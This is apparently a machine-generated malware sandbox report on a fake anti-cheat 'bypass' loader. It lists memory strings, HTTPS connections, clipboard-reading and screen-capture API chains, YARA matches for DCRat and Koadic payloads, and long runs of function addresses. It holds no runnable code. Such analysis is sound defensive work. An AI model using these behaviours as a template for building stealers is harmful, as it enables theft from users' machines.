0000000F.00000002.4158163083.0000000013624000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.000000001407A000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.00000000139DF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: Bypass.exe, 0000000F.00000002.4158163083.000000001511D000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.00000000132D3000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.00000000152F6000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.000000001414A000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.0000000013DAC000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.0000000013203000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.0000000012F32000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.00000000144B3000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.0000000014C0F000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.0000000014CA7000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.0000000013D07000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.00000000151EE000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.00000000136BC000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.0000000015286000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.0000000014E10000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.0000000014BBD000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.0000000013003000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.0000000013624000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.000000001407A000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.00000000139DF000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.000000001441B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: Bypass.exe, 0000000F.00000002.4119735415.0000000002BF1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ipinfo.io
Source: Bypass.exe, 0000000F.00000002.4158163083.000000001511D000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.00000000132D3000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.00000000152F6000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.000000001414A000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.0000000013DAC000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.0000000013203000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.0000000012F32000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.00000000144B3000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.00000000146ED000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.0000000014C0F000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.0000000014CA7000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.0000000013D07000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.00000000151EE000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.00000000136BC000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.0000000015286000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.0000000014E10000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.0000000014BBD000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.0000000013003000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.0000000014EE2000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.0000000013624000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.000000001407A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: Loader.exe.0.dr	String found in binary or memory: https://www.entrust.net/rpa0
Source: Bypass.exe, 0000000F.00000002.4158163083.000000001511D000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.00000000132D3000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.00000000152F6000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.000000001414A000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.0000000013DAC000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.0000000013203000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.0000000012F32000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.00000000144B3000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.00000000146ED000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.0000000014C0F000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.0000000014CA7000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.0000000013D07000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.00000000151EE000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.00000000136BC000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.0000000015286000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.0000000014E10000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.0000000014BBD000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.0000000013003000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.0000000013624000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.000000001407A000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.00000000139DF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49744
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown	Network traffic detected: HTTP traffic on port 49734 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown	Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49742 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49749 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49746 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49747 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49744 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49749
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49747
Source: unknown	Network traffic detected: HTTP traffic on port 49737 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49746
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49734
Source: unknown	Network traffic detected: HTTP traffic on port 49739 -> 443

Source: unknown	HTTPS traffic detected: 104.21.90.18:443 -> 192.168.2.4:49731 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.90.18:443 -> 192.168.2.4:49732 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.90.18:443 -> 192.168.2.4:49734 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.90.18:443 -> 192.168.2.4:49737 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.90.18:443 -> 192.168.2.4:49739 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.90.18:443 -> 192.168.2.4:49742 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.117.186.192:443 -> 192.168.2.4:49744 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.90.18:443 -> 192.168.2.4:49746 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.90.18:443 -> 192.168.2.4:49747 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.90.18:443 -> 192.168.2.4:49749 version: TLS 1.2

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 13_2_0042E060 OpenClipboard,GetWindowLongW,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,

13_2_0042E060

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 13_2_0042E060 OpenClipboard,GetWindowLongW,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,

13_2_0042E060

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 13_2_0042E230 GetDC,GetSystemMetrics,KiUserCallbackDispatcher,GetSystemMetrics,GetCurrentObject,GetObjectW,DeleteObject,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,SelectObject,DeleteDC,ReleaseDC,DeleteObject,

13_2_0042E230

Source: C:\ProgramData\SoftwareDistribution\Bypass.exe

Window created: window name: CLIPBRDWNDCLASS

System Summary

Malicious sample detected (through community Yara rule)

Source: 15.0.Bypass.exe.7f0000.0.unpack, type: UNPACKEDPE	Matched rule: DCRat payload Author: ditekSHen
Source: C:\Users\user\AppData\Local\Temp\Loader\AntiCheatBypass.bat, type: DROPPED	Matched rule: Koadic post-exploitation framework BAT payload Author: ditekSHen
Source: C:\Users\user\AppData\Local\Temp\Loader\AntiCheatBypasss.bat, type: DROPPED	Matched rule: Koadic post-exploitation framework BAT payload Author: ditekSHen
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe, type: DROPPED	Matched rule: DCRat payload Author: ditekSHen

Source: C:\ProgramData\SoftwareDistribution\Bypass.exe

Process Stats: CPU usage > 49%

Source: C:\Users\user\Desktop\bFZYRLnRIz.exe

Code function: 0_2_00007FF71611C2F0: CreateFileW,CloseHandle,wcscpy,wcscpy,wcscpy,wcscpy,CreateFileW,DeviceIoControl,CloseHandle,GetLastError,RemoveDirectoryW,DeleteFileW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,

0_2_00007FF71611C2F0

Source: C:\Users\user\Desktop\bFZYRLnRIz.exe	Code function: 0_2_00007FF716140754	0_2_00007FF716140754
Source: C:\Users\user\Desktop\bFZYRLnRIz.exe	Code function: 0_2_00007FF716133484	0_2_00007FF716133484
Source: C:\Users\user\Desktop\bFZYRLnRIz.exe	Code function: 0_2_00007FF71612A4AC	0_2_00007FF71612A4AC
Source: C:\Users\user\Desktop\bFZYRLnRIz.exe	Code function: 0_2_00007FF71613B190	0_2_00007FF71613B190
Source: C:\Users\user\Desktop\bFZYRLnRIz.exe	Code function: 0_2_00007FF716131F20	0_2_00007FF716131F20
Source: C:\Users\user\Desktop\bFZYRLnRIz.exe	Code function: 0_2_00007FF716115E24	0_2_00007FF716115E24
Source: C:\Users\user\Desktop\bFZYRLnRIz.exe	Code function: 0_2_00007FF71613CE88	0_2_00007FF71613CE88
Source: C:\Users\user\Desktop\bFZYRLnRIz.exe	Code function: 0_2_00007FF716124928	0_2_00007FF716124928
Source: C:\Users\user\Desktop\bFZYRLnRIz.exe	Code function: 0_2_00007FF71611F930	0_2_00007FF71611F930
Source: C:\Users\user\Desktop\bFZYRLnRIz.exe	Code function: 0_2_00007FF71614C838	0_2_00007FF71614C838
Source: C:\Users\user\Desktop\bFZYRLnRIz.exe	Code function: 0_2_00007FF716114840	0_2_00007FF716114840
Source: C:\Users\user\Desktop\bFZYRLnRIz.exe	Code function: 0_2_00007FF716152550	0_2_00007FF716152550
Source: C:\Users\user\Desktop\bFZYRLnRIz.exe	Code function: 0_2_00007FF71612B534	0_2_00007FF71612B534
Source: C:\Users\user\Desktop\bFZYRLnRIz.exe	Code function: 0_2_00007FF7161176C0	0_2_00007FF7161176C0
Source: C:\Users\user\Desktop\bFZYRLnRIz.exe	Code function: 0_2_00007FF7161353F0	0_2_00007FF7161353F0
Source: C:\Users\user\Desktop\bFZYRLnRIz.exe	Code function: 0_2_00007FF71612F180	0_2_00007FF71612F180
Source: C:\Users\user\Desktop\bFZYRLnRIz.exe	Code function: 0_2_00007FF7161321D0	0_2_00007FF7161321D0
Source: C:\Users\user\Desktop\bFZYRLnRIz.exe	Code function: 0_2_00007FF716117288	0_2_00007FF716117288
Source: C:\Users\user\Desktop\bFZYRLnRIz.exe	Code function: 0_2_00007FF71612126C	0_2_00007FF71612126C
Source: C:\Users\user\Desktop\bFZYRLnRIz.exe	Code function: 0_2_00007FF71611A310	0_2_00007FF71611A310
Source: C:\Users\user\Desktop\bFZYRLnRIz.exe	Code function: 0_2_00007FF71611C2F0	0_2_00007FF71611C2F0
Source: C:\Users\user\Desktop\bFZYRLnRIz.exe	Code function: 0_2_00007FF71612AF18	0_2_00007FF71612AF18
Source: C:\Users\user\Desktop\bFZYRLnRIz.exe	Code function: 0_2_00007FF716152080	0_2_00007FF716152080
Source: C:\Users\user\Desktop\bFZYRLnRIz.exe	Code function: 0_2_00007FF716132D58	0_2_00007FF716132D58
Source: C:\Users\user\Desktop\bFZYRLnRIz.exe	Code function: 0_2_00007FF716140754	0_2_00007FF716140754
Source: C:\Users\user\Desktop\bFZYRLnRIz.exe	Code function: 0_2_00007FF716138DF4	0_2_00007FF716138DF4
Source: C:\Users\user\Desktop\bFZYRLnRIz.exe	Code function: 0_2_00007FF71612BB90	0_2_00007FF71612BB90
Source: C:\Users\user\Desktop\bFZYRLnRIz.exe	Code function: 0_2_00007FF716125B60	0_2_00007FF716125B60
Source: C:\Users\user\Desktop\bFZYRLnRIz.exe	Code function: 0_2_00007FF716134B98	0_2_00007FF716134B98
Source: C:\Users\user\Desktop\bFZYRLnRIz.exe	Code function: 0_2_00007FF716148C1C	0_2_00007FF716148C1C
Source: C:\Users\user\Desktop\bFZYRLnRIz.exe	Code function: 0_2_00007FF716133964	0_2_00007FF716133964
Source: C:\Users\user\Desktop\bFZYRLnRIz.exe	Code function: 0_2_00007FF71612C96C	0_2_00007FF71612C96C
Source: C:\Users\user\Desktop\bFZYRLnRIz.exe	Code function: 0_2_00007FF7161489A0	0_2_00007FF7161489A0
Source: C:\Users\user\Desktop\bFZYRLnRIz.exe	Code function: 0_2_00007FF716121A48	0_2_00007FF716121A48
Source: C:\Users\user\Desktop\bFZYRLnRIz.exe	Code function: 0_2_00007FF71614FA94	0_2_00007FF71614FA94
Source: C:\Users\user\Desktop\bFZYRLnRIz.exe	Code function: 0_2_00007FF716111AA4	0_2_00007FF716111AA4
Source: C:\Users\user\Desktop\bFZYRLnRIz.exe	Code function: 0_2_00007FF716132AB0	0_2_00007FF716132AB0
Source: C:\Users\user\Desktop\bFZYRLnRIz.exe	Code function: 0_2_00007FF716155AF8	0_2_00007FF716155AF8
Source: C:\Users\user\AppData\Local\Temp\Loader\572stuOQ0pZG2Xj.exe	Code function: 11_2_00007FF64D34CE88	11_2_00007FF64D34CE88
Source: C:\Users\user\AppData\Local\Temp\Loader\572stuOQ0pZG2Xj.exe	Code function: 11_2_00007FF64D341F20	11_2_00007FF64D341F20
Source: C:\Users\user\AppData\Local\Temp\Loader\572stuOQ0pZG2Xj.exe	Code function: 11_2_00007FF64D325E24	11_2_00007FF64D325E24
Source: C:\Users\user\AppData\Local\Temp\Loader\572stuOQ0pZG2Xj.exe	Code function: 11_2_00007FF64D334928	11_2_00007FF64D334928
Source: C:\Users\user\AppData\Local\Temp\Loader\572stuOQ0pZG2Xj.exe	Code function: 11_2_00007FF64D32F930	11_2_00007FF64D32F930
Source: C:\Users\user\AppData\Local\Temp\Loader\572stuOQ0pZG2Xj.exe	Code function: 11_2_00007FF64D350754	11_2_00007FF64D350754
Source: C:\Users\user\AppData\Local\Temp\Loader\572stuOQ0pZG2Xj.exe	Code function: 11_2_00007FF64D34B190	11_2_00007FF64D34B190
Source: C:\Users\user\AppData\Local\Temp\Loader\572stuOQ0pZG2Xj.exe	Code function: 11_2_00007FF64D343484	11_2_00007FF64D343484
Source: C:\Users\user\AppData\Local\Temp\Loader\572stuOQ0pZG2Xj.exe	Code function: 11_2_00007FF64D33A4AC	11_2_00007FF64D33A4AC
Source: C:\Users\user\AppData\Local\Temp\Loader\572stuOQ0pZG2Xj.exe	Code function: 11_2_00007FF64D33AF18	11_2_00007FF64D33AF18
Source: C:\Users\user\AppData\Local\Temp\Loader\572stuOQ0pZG2Xj.exe	Code function: 11_2_00007FF64D342D58	11_2_00007FF64D342D58
Source: C:\Users\user\AppData\Local\Temp\Loader\572stuOQ0pZG2Xj.exe	Code function: 11_2_00007FF64D348DF4	11_2_00007FF64D348DF4
Source: C:\Users\user\AppData\Local\Temp\Loader\572stuOQ0pZG2Xj.exe	Code function: 11_2_00007FF64D350754	11_2_00007FF64D350754
Source: C:\Users\user\AppData\Local\Temp\Loader\572stuOQ0pZG2Xj.exe	Code function: 11_2_00007FF64D362080	11_2_00007FF64D362080
Source: C:\Users\user\AppData\Local\Temp\Loader\572stuOQ0pZG2Xj.exe	Code function: 11_2_00007FF64D35FA94	11_2_00007FF64D35FA94
Source: C:\Users\user\AppData\Local\Temp\Loader\572stuOQ0pZG2Xj.exe	Code function: 11_2_00007FF64D321AA4	11_2_00007FF64D321AA4
Source: C:\Users\user\AppData\Local\Temp\Loader\572stuOQ0pZG2Xj.exe	Code function: 11_2_00007FF64D342AB0	11_2_00007FF64D342AB0
Source: C:\Users\user\AppData\Local\Temp\Loader\572stuOQ0pZG2Xj.exe	Code function: 11_2_00007FF64D331A48	11_2_00007FF64D331A48
Source: C:\Users\user\AppData\Local\Temp\Loader\572stuOQ0pZG2Xj.exe	Code function: 11_2_00007FF64D365AF8	11_2_00007FF64D365AF8
Source: C:\Users\user\AppData\Local\Temp\Loader\572stuOQ0pZG2Xj.exe	Code function: 11_2_00007FF64D3589A0	11_2_00007FF64D3589A0
Source: C:\Users\user\AppData\Local\Temp\Loader\572stuOQ0pZG2Xj.exe	Code function: 11_2_00007FF64D343964	11_2_00007FF64D343964
Source: C:\Users\user\AppData\Local\Temp\Loader\572stuOQ0pZG2Xj.exe	Code function: 11_2_00007FF64D33C96C	11_2_00007FF64D33C96C
Source: C:\Users\user\AppData\Local\Temp\Loader\572stuOQ0pZG2Xj.exe	Code function: 11_2_00007FF64D33BB90	11_2_00007FF64D33BB90
Source: C:\Users\user\AppData\Local\Temp\Loader\572stuOQ0pZG2Xj.exe	Code function: 11_2_00007FF64D344B98	11_2_00007FF64D344B98
Source: C:\Users\user\AppData\Local\Temp\Loader\572stuOQ0pZG2Xj.exe	Code function: 11_2_00007FF64D335B60	11_2_00007FF64D335B60
Source: C:\Users\user\AppData\Local\Temp\Loader\572stuOQ0pZG2Xj.exe	Code function: 11_2_00007FF64D358C1C	11_2_00007FF64D358C1C
Source: C:\Users\user\AppData\Local\Temp\Loader\572stuOQ0pZG2Xj.exe	Code function: 11_2_00007FF64D3276C0	11_2_00007FF64D3276C0
Source: C:\Users\user\AppData\Local\Temp\Loader\572stuOQ0pZG2Xj.exe	Code function: 11_2_00007FF64D362550	11_2_00007FF64D362550
Source: C:\Users\user\AppData\Local\Temp\Loader\572stuOQ0pZG2Xj.exe	Code function: 11_2_00007FF64D35C838	11_2_00007FF64D35C838
Source: C:\Users\user\AppData\Local\Temp\Loader\572stuOQ0pZG2Xj.exe	Code function: 11_2_00007FF64D324840	11_2_00007FF64D324840
Source: C:\Users\user\AppData\Local\Temp\Loader\572stuOQ0pZG2Xj.exe	Code function: 11_2_00007FF64D327288	11_2_00007FF64D327288
Source: C:\Users\user\AppData\Local\Temp\Loader\572stuOQ0pZG2Xj.exe	Code function: 11_2_00007FF64D33126C	11_2_00007FF64D33126C
Source: C:\Users\user\AppData\Local\Temp\Loader\572stuOQ0pZG2Xj.exe	Code function: 11_2_00007FF64D32A310	11_2_00007FF64D32A310
Source: C:\Users\user\AppData\Local\Temp\Loader\572stuOQ0pZG2Xj.exe	Code function: 11_2_00007FF64D32C2F0	11_2_00007FF64D32C2F0
Source: C:\Users\user\AppData\Local\Temp\Loader\572stuOQ0pZG2Xj.exe	Code function: 11_2_00007FF64D33F180	11_2_00007FF64D33F180
Source: C:\Users\user\AppData\Local\Temp\Loader\572stuOQ0pZG2Xj.exe	Code function: 11_2_00007FF64D3421D0	11_2_00007FF64D3421D0
Source: C:\Users\user\AppData\Local\Temp\Loader\572stuOQ0pZG2Xj.exe	Code function: 11_2_00007FF64D33B534	11_2_00007FF64D33B534
Source: C:\Users\user\AppData\Local\Temp\Loader\572stuOQ0pZG2Xj.exe	Code function: 11_2_00007FF64D3453F0	11_2_00007FF64D3453F0
Source: C:\Users\user\AppData\Local\Temp\Loader\Loader.exe	Code function: 12_2_00A1E06E	12_2_00A1E06E
Source: C:\Users\user\AppData\Local\Temp\Loader\Loader.exe	Code function: 12_2_00A16364	12_2_00A16364
Source: C:\Users\user\AppData\Local\Temp\Loader\Loader.exe	Code function: 12_2_00A28448	12_2_00A28448
Source: C:\Users\user\AppData\Local\Temp\Loader\Loader.exe	Code function: 12_2_00A1E52B	12_2_00A1E52B
Source: C:\Users\user\AppData\Local\Temp\Loader\Loader.exe	Code function: 12_2_009CC6CD	12_2_009CC6CD
Source: C:\Users\user\AppData\Local\Temp\Loader\Loader.exe	Code function: 12_2_009CE670	12_2_009CE670
Source: C:\Users\user\AppData\Local\Temp\Loader\Loader.exe	Code function: 12_2_009FC733	12_2_009FC733
Source: C:\Users\user\AppData\Local\Temp\Loader\Loader.exe	Code function: 12_2_009FE958	12_2_009FE958
Source: C:\Users\user\AppData\Local\Temp\Loader\Loader.exe	Code function: 12_2_009FA958	12_2_009FA958
Source: C:\Users\user\AppData\Local\Temp\Loader\Loader.exe	Code function: 12_2_009DCB1F	12_2_009DCB1F
Source: C:\Users\user\AppData\Local\Temp\Loader\Loader.exe	Code function: 12_2_009FCC38	12_2_009FCC38
Source: C:\Users\user\AppData\Local\Temp\Loader\Loader.exe	Code function: 12_2_009D0C5A	12_2_009D0C5A
Source: C:\Users\user\AppData\Local\Temp\Loader\Loader.exe	Code function: 12_2_009DAEF8	12_2_009DAEF8
Source: C:\Users\user\AppData\Local\Temp\Loader\Loader.exe	Code function: 12_2_00A20E0D	12_2_00A20E0D
Source: C:\Users\user\AppData\Local\Temp\Loader\Loader.exe	Code function: 12_2_009D0FA2	12_2_009D0FA2
Source: C:\Users\user\AppData\Local\Temp\Loader\Loader.exe	Code function: 12_2_00A1AF58	12_2_00A1AF58
Source: C:\Users\user\AppData\Local\Temp\Loader\Loader.exe	Code function: 12_2_00A2B098	12_2_00A2B098
Source: C:\Users\user\AppData\Local\Temp\Loader\Loader.exe	Code function: 12_2_009FB328	12_2_009FB328
Source: C:\Users\user\AppData\Local\Temp\Loader\Loader.exe	Code function: 12_2_00A1B458	12_2_00A1B458
Source: C:\Users\user\AppData\Local\Temp\Loader\Loader.exe	Code function: 12_2_00A1D5E3	12_2_00A1D5E3
Source: C:\Users\user\AppData\Local\Temp\Loader\Loader.exe	Code function: 12_2_009E3682	12_2_009E3682
Source: C:\Users\user\AppData\Local\Temp\Loader\Loader.exe	Code function: 12_2_00A17648	12_2_00A17648
Source: C:\Users\user\AppData\Local\Temp\Loader\Loader.exe	Code function: 12_2_009C98A0	12_2_009C98A0
Source: C:\Users\user\AppData\Local\Temp\Loader\Loader.exe	Code function: 12_2_00A2F828	12_2_00A2F828
Source: C:\Users\user\AppData\Local\Temp\Loader\Loader.exe	Code function: 12_2_009FB938	12_2_009FB938
Source: C:\Users\user\AppData\Local\Temp\Loader\Loader.exe	Code function: 12_2_00A05948	12_2_00A05948
Source: C:\Users\user\AppData\Local\Temp\Loader\Loader.exe	Code function: 12_2_00A2FAE8	12_2_00A2FAE8
Source: C:\Users\user\AppData\Local\Temp\Loader\Loader.exe	Code function: 12_2_009F9B78	12_2_009F9B78
Source: C:\Users\user\AppData\Local\Temp\Loader\Loader.exe	Code function: 12_2_00A2FDF8	12_2_00A2FDF8
Source: C:\Users\user\AppData\Local\Temp\Loader\Loader.exe	Code function: 12_2_009F9F38	12_2_009F9F38
Source: C:\Users\user\AppData\Local\Temp\Loader\Loader.exe	Code function: 12_2_009FBF58	12_2_009FBF58
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 13_2_00439830	13_2_00439830
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 13_2_0041F309	13_2_0041F309
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 13_2_00405330	13_2_00405330
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 13_2_00420D8C	13_2_00420D8C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 13_2_00421650	13_2_00421650
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 13_2_00416EEE	13_2_00416EEE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 13_2_00401F50	13_2_00401F50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 13_2_00415F7D	13_2_00415F7D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 13_2_00420073	13_2_00420073
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 13_2_00428076	13_2_00428076
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 13_2_004350A0	13_2_004350A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 13_2_00405940	13_2_00405940
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 13_2_0040F950	13_2_0040F950
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 13_2_00406157	13_2_00406157
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 13_2_00408960	13_2_00408960
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 13_2_00438170	13_2_00438170
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 13_2_00401278	13_2_00401278
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 13_2_00422A7B	13_2_00422A7B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 13_2_004072C0	13_2_004072C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 13_2_00439AF0	13_2_00439AF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 13_2_00403B80	13_2_00403B80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 13_2_00406C40	13_2_00406C40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 13_2_0040644A	13_2_0040644A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 13_2_00432450	13_2_00432450
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 13_2_0041DC5C	13_2_0041DC5C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 13_2_00425460	13_2_00425460
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 13_2_00437CA0	13_2_00437CA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 13_2_00428533	13_2_00428533
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 13_2_004275EB	13_2_004275EB
